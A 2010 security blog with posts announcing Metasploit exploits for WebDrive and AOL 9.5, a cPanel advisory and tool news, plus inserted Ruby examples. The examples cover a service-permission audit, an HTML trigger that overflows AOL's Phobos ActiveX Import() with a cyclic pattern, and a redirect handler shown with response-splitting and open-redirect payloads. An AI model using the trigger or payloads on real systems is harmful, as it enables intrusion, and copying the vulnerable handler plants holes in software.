Posted by Trancer on Jan 26 2010

Here’s a local privilege escalation exploit I wrote, as a Metasploit Meterpreter script, for the South River Technologies WebDrive Service Bad Security Descriptor vulnerability.

This vulnerability was discovered by bellick of the Nine:Situations:Group and the original advisory can be found on the Nine:Situations:Group web site – South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges.
As the advisory explains, local elevation of privileges is possible because the South River Technologies WebDrive service carries a bad (in fact empty) security descriptor, so the access control that would normally keep unprivileged local users from modifying or taking control of the service is not enforced.

This exploit was inspired by MC‘s HP PML Driver HPZ12 privilege escalation exploit.
In this exploit I’ve also added a mitigation option, which sets a correct security descriptor on the SRT WebDrive service. Note that the vulnerability is still unpatched; the exploit was tested on the latest version of SRT WebDrive.
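The check behind such a mitigation option, as an added Ruby example that is not the srt_webdrive_priv.rb script and not code from the advisory: it parses a service security descriptor in the SDDL form that `sc sdshow <service>` prints, flags ACEs that hand low-privileged principals rights to reconfigure or take over the service, and carries a stock default service DACL of the kind a fix would apply with `sc sdset`. The default SDDL string and the weak sample descriptors are assumptions constructed for the example.

```ruby
# Added example (not the original srt_webdrive_priv.rb): audit a Windows service
# security descriptor in the SDDL form printed by "sc sdshow <service>" and flag
# access-control entries that let low-privileged principals reconfigure the service.

# Service-specific right abbreviations as used by sc sdshow / sc sdset.
# (Note that "WD" as a right means WRITE_DAC, while "WD" as a trustee means Everyone.)
SERVICE_RIGHTS = {
  'CC' => :query_config,    'DC' => :change_config, 'LC' => :query_status,
  'SW' => :enum_dependents, 'RP' => :start,         'WP' => :stop,
  'DT' => :pause_continue,  'LO' => :interrogate,   'CR' => :user_control,
  'SD' => :delete,          'RC' => :read_control,  'WD' => :write_dac,
  'WO' => :write_owner,     'GA' => :generic_all,   'GW' => :generic_write,
  'GR' => :generic_read,    'GX' => :generic_execute
}.freeze

# Rights that let the holder change what the service runs, or who controls it.
DANGEROUS = %i[change_config delete write_dac write_owner generic_all generic_write].freeze

# Well-known SID abbreviations that every local user is a member of.
LOW_PRIV = %w[WD AU BU IU AN].freeze # Everyone, Authenticated Users, Users, Interactive, Anonymous

Ace = Struct.new(:type, :flags, :rights, :trustee)

# Parse the DACL (D: part) of an SDDL string into Ace structs.
# Returns nil when the string carries no DACL at all.
def parse_dacl(sddl)
  m = sddl.match(/D:[A-Z]*(?<aces>(?:\([^)]*\))*)/)
  return nil unless m
  m[:aces].scan(/\(([^)]*)\)/).map do |(body)|
    # ACE fields: type;flags;rights;object_guid;inherit_object_guid;trustee
    type, flags, rights, _obj, _inherit_obj, trustee = body.split(';', 6)
    Ace.new(type, flags, rights.scan(/[A-Z]{2}/).map { |r| SERVICE_RIGHTS[r] }.compact, trustee)
  end
end

# Returns a list of findings; an empty list means no low-privileged principal
# can reconfigure or take over the service.
def audit_service_sddl(sddl)
  aces = parse_dacl(sddl)
  # No DACL at all (a NULL DACL) means Windows grants everyone full control.
  return ['NULL DACL: Everyone has full control'] if aces.nil?
  # An empty DACL grants nobody access; still a misconfiguration, just a different one.
  return ['empty DACL: no access granted to any principal'] if aces.empty?
  aces.select { |a| a.type == 'A' && LOW_PRIV.include?(a.trustee) }
      .map    { |a| [a.trustee, a.rights & DANGEROUS] }
      .reject { |_, bad| bad.empty? }
      .map    { |who, bad| "#{who} granted #{bad.join(', ')}" }
end

# Assumption of this example: the stock default service DACL on Windows XP/2003
# (SYSTEM, Administrators, Authenticated Users, Power Users), the kind of value
# a mitigation would apply with "sc sdset <service> <sddl>".
DEFAULT_SERVICE_SDDL =
  'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' \
  '(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)' \
  'S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'

# Constructed weak descriptors for the demo.
WEAK_SDDL = 'D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)' # Everyone: full control of the service
NULL_DACL_SDDL = ''

if __FILE__ == $PROGRAM_NAME
  { 'weak' => WEAK_SDDL, 'default' => DEFAULT_SERVICE_SDDL, 'none' => NULL_DACL_SDDL }.each do |name, sddl|
    puts "#{name}: #{audit_service_sddl(sddl).inspect}"
  end
end
```

The audit distinguishes a missing DACL (everyone gets full control) from an empty one (nobody gets access), because the two are easy to confuse when reading `sc sdshow` output by eye and they fail in opposite directions. Run it against `sc sdshow <service>` output on the target box; an empty findings list for the default descriptor is the state the mitigation should leave the service in.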

The exploit was successfully tested on the following platforms:
– South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.

Download srt_webdrive_priv.rb.
Also on Metasploit and exploit-db.

References:
CVE-2009-4606
OSVDB 59080
BID 37955
exploit-db 9970

Categories: Exploits, Metasploit


Posted by Trancer on Jan 25 2010

Wrote a new Metasploit exploit module for the AOL 9.5 Phobos.Playlist ActiveX control Import() stack-based buffer overflow vulnerability.

This module exploits a stack-based buffer overflow in Phobos.dll of AOL 9.5. By passing an overly long string to the ‘Import()’ method, an attacker can overrun a stack buffer and execute arbitrary code.

This vulnerability was found by Hellcode Research and was published recently by Dz_attacker. There is still no patch from AOL; if you want to test it, you can get the vulnerable package from the AOL 9.5 page.

The exploit was successfully tested on the following platforms:
– AOL 9.5 (Revision 4337.155) on Internet Explorer 7, Windows XP SP3

Phobos.dll version tested:
– File Version: 9.5.0.1
– ClassID: A105BD70-BF56-4D10-BC91-41C88321F47C
– RegKey Safe for Script: False
– RegKey Safe for Init: False
– Implements IObjectSafety: False
– KillBitSet: False

Because the control is not marked safe for scripting or safe for initialization and does not implement IObjectSafety, Internet Explorer will not script it from the Internet zone; exploitation is possible only from the Local Machine zone, which means the victim must open the generated exploit file locally.
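How those registration values translate into the “Local Machine zone only” conclusion, and the first step of working the overflow, as an added Ruby example that is not the aol_phobos_bof.rb module: it classifies a control from the kill bit, IObjectSafety and the two safety component categories, and generates a local HTML page that feeds a cyclic pattern to Import() so the offset that reaches EIP can be read off in a debugger. The CATID and kill-bit values are well-known Windows constants; the pattern routine is this example’s own rewrite of the pattern_create idea; no return address or shellcode is included because none is given in this post.

```ruby
# Added example, not the aol_phobos_bof.rb module. Part 1 decides, from a
# control's registration data, which IE zone can script it. Part 2 builds a
# local HTML page that passes a cyclic pattern to Import() so the overwrite
# offset can be read from EIP in a debugger.

# Component categories IE checks (well-known CATIDs) when a control does not
# implement IObjectSafety, and the kill-bit flag stored as "Compatibility Flags"
# under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}.
CATID_SAFE_FOR_SCRIPTING    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
CATID_SAFE_FOR_INITIALIZING = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
KILL_BIT = 0x400

ControlInfo = Struct.new(:clsid, :categories, :implements_iobjectsafety, :compat_flags)

# :blocked           - kill bit set, IE will not load it anywhere
# :ask_iobjectsafety - the control answers at runtime; check what it reports
# :internet          - registered safe for scripting and init: remote pages can script it
# :local_machine     - neither: only a page opened from disk can script it
def scriptable_from(info)
  return :blocked if (info.compat_flags & KILL_BIT) != 0
  return :ask_iobjectsafety if info.implements_iobjectsafety
  safe = [CATID_SAFE_FOR_SCRIPTING, CATID_SAFE_FOR_INITIALIZING].all? { |c| info.categories.include?(c) }
  safe ? :internet : :local_machine
end

# The Phobos.dll registration exactly as listed in this post: no safety
# categories, no IObjectSafety, no kill bit.
PHOBOS = ControlInfo.new('A105BD70-BF56-4D10-BC91-41C88321F47C', [], false, 0)

# Cyclic pattern in the style of Metasploit's pattern_create (Aa0Aa1Aa2...):
# a 4-byte window read from EIP maps back to one offset within the pattern.
def pattern_create(length)
  out = +''
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Offset of the 4 bytes seen in EIP, given as the ASCII they decode to.
def pattern_offset(pattern, eip_bytes)
  pattern.index(eip_bytes)
end

# Local HTML trigger: instantiate the control by CLSID and call the method with
# the pattern. It must be opened from disk; IE will not script this control
# from a remote page (see the zone classification above).
def build_trigger_html(clsid, method, length)
  <<~HTML
    <html><body>
    <object classid="clsid:#{clsid}" id="target"></object>
    <script type="text/javascript">
      var buf = "#{pattern_create(length)}";
      target.#{method}(buf);
    </script>
    </body></html>
  HTML
end

if __FILE__ == $PROGRAM_NAME
  puts "Phobos.Playlist scriptable from: #{scriptable_from(PHOBOS)}"
  puts build_trigger_html(PHOBOS.clsid, 'Import', 5000)
end
```

Save the generated page to disk, open it in IE with a debugger attached, and feed the EIP value (as ASCII) to pattern_offset to get the distance from the start of the buffer to the saved return address; only then does it make sense to look for a return address and shellcode placement. Because the page is opened from the Local Machine zone, expect IE’s local-content restrictions to prompt before the control is scripted.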

Download aol_phobos_bof.rb.
Also on Metasploit and exploit-db.

References:
OSVDB 61964
exploit-db 11204

Categories: Exploits, Metasploit


Posted by Trancer on Jan 22 2010

Hello everyone. If you’re into exploit development, or new to it and want to learn how it is done, here’s a series of tutorials by Peter Van Eeckhoutte (a.k.a. corelanc0d3r), which I strongly recommend, that will give you solid knowledge of exploit writing.
Today Peter published the latest addition to his exploit writing tutorial series, on Win32 egg hunting. Check it out:

Enjoy the reading!

Categories: Exploitation


Posted by Trancer on Jan 21 2010

Hello readers,
From now on you can follow Recognize-Security on Twitter!
Check it out – @rec_sec

Categories: Rec-Sec


Posted by Trancer on Jan 21 2010

Security Advisory for cPanel and WHM (WebHost Manager) version 11.25.
Vulnerabilities found:

  • HTTP Response Splitting vulnerability
  • Open Redirection vulnerability

PDF Format cPanel HTTP Response Splitting Vulnerability – Security Advisory (PDF).
TXT Format cPanel HTTP Response Splitting Vulnerability – Security Advisory (TXT).

I’d like to point out the lame work of the cPanel Security Team on these vulnerabilities. Usually when I report a vulnerability, I get some kind of interaction with the vendor’s developers and/or security team, and most of the time I enjoy working with the people involved. In this case, the cPanel Security Team was unresponsive. Eventually I was forced to release the security advisory even though one of the vulnerabilities (the Open Redirection vulnerability) is still unpatched.
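The two bug classes in the advisory, shown on a toy redirect endpoint as an added Ruby example that is not cPanel code (the advisory does not reproduce cPanel’s source): the vulnerable handler copies a user-supplied value straight into the Location header, which gives both HTTP response splitting (CR LF in the value ends the header) and an open redirect (any absolute URL is accepted); the hardened handler rejects control characters and only follows same-site paths or allow-listed hosts. The parameter, the host allow-list and the attack inputs are constructed for the example.

```ruby
# Added example, not cPanel code: a redirect endpoint written the vulnerable
# way and the hardened way, returning raw HTTP responses so the difference is
# visible without a web server.
require 'uri'

CRLF = "\r\n"
ALLOWED_HOSTS = %w[example.com www.example.com].freeze # constructed allow-list

# Vulnerable: the user-supplied value goes straight into the Location header.
# A decoded CR LF in the value terminates the header, so the attacker appends
# headers (response splitting); any absolute URL is accepted (open redirect).
def redirect_vulnerable(target)
  "HTTP/1.1 302 Found#{CRLF}Location: #{target}#{CRLF}#{CRLF}"
end

def error_response
  "HTTP/1.1 400 Bad Request#{CRLF}Content-Length: 0#{CRLF}#{CRLF}"
end

# Hardened: reject control characters outright (CR, LF, NUL, ...), then only
# allow a site-relative path or an absolute http(s) URL on an allow-listed host.
def redirect_hardened(target)
  return error_response unless target.is_a?(String)
  return error_response if target.match?(/[\x00-\x1f\x7f]/)
  # "//host" and "/\host" are protocol-relative in browsers: treat them as external.
  if target.start_with?('/') && !target.start_with?('//', '/\\')
    safe = target
  else
    uri = URI.parse(target) rescue nil
    return error_response unless uri && %w[http https].include?(uri.scheme) &&
                                 ALLOWED_HOSTS.include?(uri.host)
    safe = uri.to_s
  end
  "HTTP/1.1 302 Found#{CRLF}Location: #{safe}#{CRLF}#{CRLF}"
end

# Header lines of a response (status line excluded); a split response shows
# the injected extras here.
def header_lines(resp)
  resp.split(CRLF + CRLF, 2).first.split(CRLF)[1..-1]
end

# Constructed attack inputs. A browser would send the first one URL-encoded
# (%0d%0a); it is shown already decoded, as the application sees it.
SPLIT_PAYLOAD = "http://example.com/\r\nSet-Cookie: session=attacker\r\n\r\n<html>spoofed</html>"
OPEN_REDIRECT = 'http://evil.example.net/login'

if __FILE__ == $PROGRAM_NAME
  puts header_lines(redirect_vulnerable(SPLIT_PAYLOAD)).inspect
  puts redirect_hardened(SPLIT_PAYLOAD).lines.first
  puts redirect_hardened(OPEN_REDIRECT).lines.first
  puts redirect_hardened('/account?tab=1').lines[1]
end
```

Rejecting the request is preferable to stripping CR and LF from the value: stripping silently turns a hostile input into a different URL, and a filter that misses one encoding of a line break reopens the split. The allow-list matters as well, since blocking control characters fixes response splitting but does nothing for the open redirect.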

References:
BID 37902
OSVDB 61954
exploit-db 11211

Categories: Advisories, Web Application Security


Posted by Trancer on Jan 21 2010

A new version of the Nmap Security Scanner was released today, the first stable release since 5.00: Nmap 5.20.
This version brings tons of improvements, such as improved UDP scanning, new Nmap Scripting Engine scripts, updated OS and version detection, and more.
Check out the Change log and announcement of Nmap 5.20.
Download Nmap 5.20.

Categories: Tools


Posted by Trancer on Jan 21 2010

A new version of the penetration testers’ and security experts’ favourite Linux distribution has been released: BackTrack Linux 4.

This version offers new tools, a new kernel and tons of bug fixes. Also, BackTrack Linux is no longer part of remote-exploit.org; it has a new home at backtrack-linux.org.

I have used the new version for the last couple of days and find it very useful and cool. Recommended!
Download BackTrack Linux 4.

Categories: Tools